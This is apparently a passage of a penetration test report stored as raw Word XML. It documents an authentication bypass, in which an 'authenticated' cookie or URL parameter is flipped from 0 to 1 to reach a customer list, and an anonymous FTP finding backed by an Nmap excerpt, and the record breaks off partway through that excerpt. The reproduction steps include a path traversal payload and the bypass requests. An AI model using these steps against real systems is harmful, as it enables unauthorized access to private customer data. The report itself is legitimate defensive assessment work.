          <w:p w14:paraId="20FD2A31" w14:textId="015ABB45" w:rsidR="00B40A5B" w:rsidRPr="00B40A5B" w:rsidRDefault="002C6421" w:rsidP="002C6421">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C6421">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="10CF02B3" w14:textId="77777777" w:rsidR="00B40A5B" w:rsidRDefault="00B40A5B" w:rsidP="00B40A5B">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70A748AB" w14:textId="3C5D03A5" w:rsidR="00B40A5B" w:rsidRDefault="002C6421" w:rsidP="00B40A5B">
      <w:r>
        <w:t>The customer list was shown in the assessor’s browser when the URL was loaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7ED2ED" w14:textId="59F4E703" w:rsidR="002C6421" w:rsidRPr="002C6421" w:rsidRDefault="002C6421" w:rsidP="002C6421">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64CA60D2" wp14:editId="0E3CCDF3">
            <wp:extent cx="3067050" cy="2705100"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="19050"/>
            <wp:docPr id="442094806"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4806" name="Picture 5"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27051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Sample Customer List</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E437443" w14:textId="77777777" w:rsidR="002C6421" w:rsidRDefault="002C6421" w:rsidP="002C6421">
      <w:r>
        <w:t>An attacker who exploited this vulnerability would be able to access sensitive data and other resources protected by authentication without signing into the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191D37D7" w14:textId="77777777" w:rsidR="00455A9D" w:rsidRDefault="00455A9D" w:rsidP="00455A9D">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F5E52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B72241" w14:textId="2CB8424F" w:rsidR="002C6421" w:rsidRDefault="002C6421" w:rsidP="002C6421">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B40A5B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://10.10.0.66</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F886E59" w14:textId="1AAD79FF" w:rsidR="002C6421" w:rsidRDefault="002C6421" w:rsidP="002C6421">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attempt to access a protected resource such as </w:t>
      </w:r>
      <w:r w:rsidRPr="002076EB">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>http://10.10.0.66/internal/customers.php?list</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002076EB">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>=..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002076EB">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>%2Fdata%2Fcustomer.list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F1EBEA" w14:textId="1C971D41" w:rsidR="002C6421" w:rsidRDefault="002C6421" w:rsidP="002C6421">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Intercept the HTTP request using a tool such as </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6421">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>Burp Suite Intercept</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E2A481" w14:textId="6C777131" w:rsidR="002C6421" w:rsidRDefault="002C6421" w:rsidP="002C6421">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Change the value of the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6421">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>authenticated</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cookie from </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6421">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6421">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E573756" w14:textId="06123FD7" w:rsidR="002C6421" w:rsidRPr="002C6421" w:rsidRDefault="002C6421" w:rsidP="002C6421">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Send the edited request to the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655C1245" w14:textId="77777777" w:rsidR="002C6421" w:rsidRDefault="002C6421">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A9DE0C" w14:textId="1DE13FDF" w:rsidR="002C6421" w:rsidRDefault="002C6421" w:rsidP="002C6421">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B40A5B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>http://10.10.0.66:8001 (Staging)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B058FA" w14:textId="6AD6C905" w:rsidR="002C6421" w:rsidRDefault="002C6421" w:rsidP="002C6421">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attempt to access a protected resource such as </w:t>
      </w:r>
      <w:r w:rsidRPr="002076EB">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>http://10.10.0.66:8001/internal/customers.php?authenticated=</w:t>
      </w:r>
      <w:r w:rsidR="002076EB" w:rsidRPr="002076EB">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="002076EB">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&amp;list</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002076EB">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>=..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002076EB">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>%2Fdata%2Fcustomer.list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DAFD9F" w14:textId="483B6D9F" w:rsidR="00B40A5B" w:rsidRPr="002076EB" w:rsidRDefault="002C6421" w:rsidP="00455A9D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Change the value of the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6421">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>authenticated</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002076EB">
        <w:t>URL parameter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6421">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6421">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="002076EB">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="002076EB">
        <w:br/>
      </w:r>
      <w:r w:rsidR="002076EB" w:rsidRPr="002076EB">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>http://10.10.0.66:8001/internal/customers.php?authenticated=1&amp;list</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="002076EB" w:rsidRPr="002076EB">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>=..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="002076EB" w:rsidRPr="002076EB">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>%2Fdata%2Fcustomer.list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20194E2B" w14:textId="77777777" w:rsidR="00D847D3" w:rsidRPr="00D36E2B" w:rsidRDefault="00D847D3" w:rsidP="00D847D3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:commentRangeStart w:id="18"/>
      <w:r w:rsidRPr="006F5E52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remediation Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CFC608" w14:textId="5E03ABF6" w:rsidR="00D847D3" w:rsidRDefault="00D847D3" w:rsidP="00D847D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D847D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Implement proper authentication checks:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Instead of relying solely on a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>boolean</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> cookie, a more secure method of authentication should be implemented, such as session tokens, JWT tokens, or multi-factor authentication. This will help ensure that only authorized users are able to access sensitive data or functionality within the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577E3D3C" w14:textId="64ECF593" w:rsidR="00D847D3" w:rsidRDefault="00D847D3" w:rsidP="00D847D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D847D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Role-based access control (RBAC):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Role-based access control (RBAC) can be used to enforce authorization controls within the application. This involves defining roles and permissions for different types of users and enforcing those permissions </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>through the use of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> access controls. This can help ensure that users only have access to the data and functionality that they need to perform their job functions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9E40E6" w14:textId="77777777" w:rsidR="00D847D3" w:rsidRPr="00455A9D" w:rsidRDefault="00D847D3" w:rsidP="00D847D3"/>
    <w:p w14:paraId="482C9BBC" w14:textId="77777777" w:rsidR="00D847D3" w:rsidRDefault="00D847D3" w:rsidP="00D847D3">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F5E52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Additional Resources</w:t>
      </w:r>
      <w:commentRangeEnd w:id="18"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:commentReference w:id="18"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="725F4F97" w14:textId="3B429507" w:rsidR="00D847D3" w:rsidRDefault="00D847D3" w:rsidP="00D847D3">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Fortinet - </w:t>
      </w:r>
      <w:r w:rsidRPr="00D847D3">
        <w:t>What Is Token-based Authentication?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AB6242" w14:textId="479C4756" w:rsidR="00D847D3" w:rsidRDefault="00D847D3" w:rsidP="00D847D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidRPr="00680A05">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.fortinet.com/resources/cyberglossary/authentication-token#:~:text=What%20Is%20Token%2Dbased%20Authentication,a%20unique%20encrypted%20authentication%20token</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D847D3">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2CCDAE" w14:textId="5186167B" w:rsidR="00455A9D" w:rsidRDefault="00055045">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD33CAE" w14:textId="77777777" w:rsidR="00055045" w:rsidRDefault="00055045">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15802425" w14:textId="447A484D" w:rsidR="003C219B" w:rsidRPr="001215EC" w:rsidRDefault="003C219B" w:rsidP="003C219B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Anonymous FTP Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF76F2A" w14:textId="77777777" w:rsidR="003C219B" w:rsidRPr="006F5E52" w:rsidRDefault="003C219B" w:rsidP="003C219B">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3C219B" w:rsidRPr="005264D0" w14:paraId="3143173E"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0270824B" w14:textId="0D50A751" w:rsidR="003C219B" w:rsidRPr="005264D0" w:rsidRDefault="00B47DC6" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>Anonymous FTP Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C219B" w:rsidRPr="005264D0" w14:paraId="6D10DF3A"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75DF6E81" w14:textId="77777777" w:rsidR="003C219B" w:rsidRPr="00DA733E" w:rsidRDefault="003C219B"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179F3890" w14:textId="77777777" w:rsidR="003C219B" w:rsidRPr="005264D0" w:rsidRDefault="003C219B" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CVSS Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5305" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFAFAF"/>
          </w:tcPr>
          <w:p w14:paraId="52499CCA" w14:textId="111C3068" w:rsidR="003C219B" w:rsidRPr="005264D0" w:rsidRDefault="002318B9" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>7.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C219B" w:rsidRPr="005264D0" w14:paraId="207530A6"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3B5098D9" w14:textId="77777777" w:rsidR="003C219B" w:rsidRPr="005264D0" w:rsidRDefault="003C219B" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2399" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E04A283" w14:textId="77777777" w:rsidR="003C219B" w:rsidRPr="005264D0" w:rsidRDefault="003C219B" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CVSS Vector String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32DB41B9" w14:textId="2CCD8748" w:rsidR="003C219B" w:rsidRPr="005264D0" w:rsidRDefault="002318B9" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002318B9">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CVSS:3.1/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="002318B9">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>AV:N</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="002318B9">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4AD80CFF" w14:textId="2975661A" w:rsidR="003C219B" w:rsidRPr="00DA733E" w:rsidRDefault="003C219B" w:rsidP="003C219B">
      <w:pPr>
        <w:spacing w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002318B9">
        <w:t>Anonymous FTP access vulnerabilities occur when a server is configured to allow unknown users to access and store files through FTP. This access allows unauthenticated users to read files that may be restricted and access sensitive information. In many cases, unauthorized users may even be able to store files on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D77716B" w14:textId="77777777" w:rsidR="003C219B" w:rsidRDefault="003C219B" w:rsidP="003C219B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Affected Locations</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A470D75" w14:textId="77777777" w:rsidR="003C219B" w:rsidRPr="003C17E2" w:rsidRDefault="003C219B" w:rsidP="003C219B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="003C17E2">
        <w:t>10.10.0.66</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DC1773" w14:textId="388D1F26" w:rsidR="003C219B" w:rsidRPr="003C17E2" w:rsidRDefault="003C219B" w:rsidP="003C219B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00B51413">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002318B9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>Port 9001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707C575D" w14:textId="77777777" w:rsidR="003C219B" w:rsidRDefault="003C219B" w:rsidP="003C219B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D307AA7" w14:textId="77777777" w:rsidR="003C219B" w:rsidRPr="006F5E52" w:rsidRDefault="003C219B" w:rsidP="003C219B">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F5E52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DE39D9" w14:textId="0821780E" w:rsidR="003C219B" w:rsidRDefault="003C219B" w:rsidP="003C219B">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="002318B9">
        <w:t xml:space="preserve">results of the Hyperthetical team’s </w:t>
      </w:r>
      <w:r w:rsidR="002318B9" w:rsidRPr="002318B9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:r w:rsidR="002318B9">
        <w:t xml:space="preserve"> scan of the NBN external network indicated that the FTP service running on port 9001 allowed anonymous access. These results are shown in the following figure:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="003C219B" w14:paraId="2C12405B" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="3F7D47D1" w14:textId="77777777" w:rsidR="002318B9" w:rsidRPr="002318B9" w:rsidRDefault="002318B9" w:rsidP="002318B9">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="002318B9">
              <w:t>Nmap scan report for 10.10.0.66</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4438F0EC" w14:textId="77777777" w:rsidR="002318B9" w:rsidRPr="002318B9" w:rsidRDefault="002318B9" w:rsidP="002318B9">
            <w:pPr>
              <w:pStyle w:val="omittedforbrevity"/>
            </w:pPr>
            <w:r w:rsidRPr="002318B9">
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="577F58F6" w14:textId="77777777" w:rsidR="002318B9" w:rsidRPr="002318B9" w:rsidRDefault="002318B9" w:rsidP="002318B9">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="002318B9">
              <w:t xml:space="preserve">PORT     </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="002318B9">
              <w:t>STATE  SERVICE</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="002318B9">
              <w:t xml:space="preserve">    VERSION</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B84BD4B" w14:textId="77777777" w:rsidR="002318B9" w:rsidRPr="002318B9" w:rsidRDefault="002318B9" w:rsidP="002318B9">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="0056593D">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>9001/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0056593D">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0056593D">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t xml:space="preserve"> open   ftp</w:t>
            </w:r>
            <w:r w:rsidRPr="002318B9">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002318B9">
              <w:t>vsftpd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002318B9">
              <w:t xml:space="preserve"> 3.0.3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E5EBD9D" w14:textId="77777777" w:rsidR="002318B9" w:rsidRPr="002318B9" w:rsidRDefault="002318B9" w:rsidP="002318B9">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="002318B9">
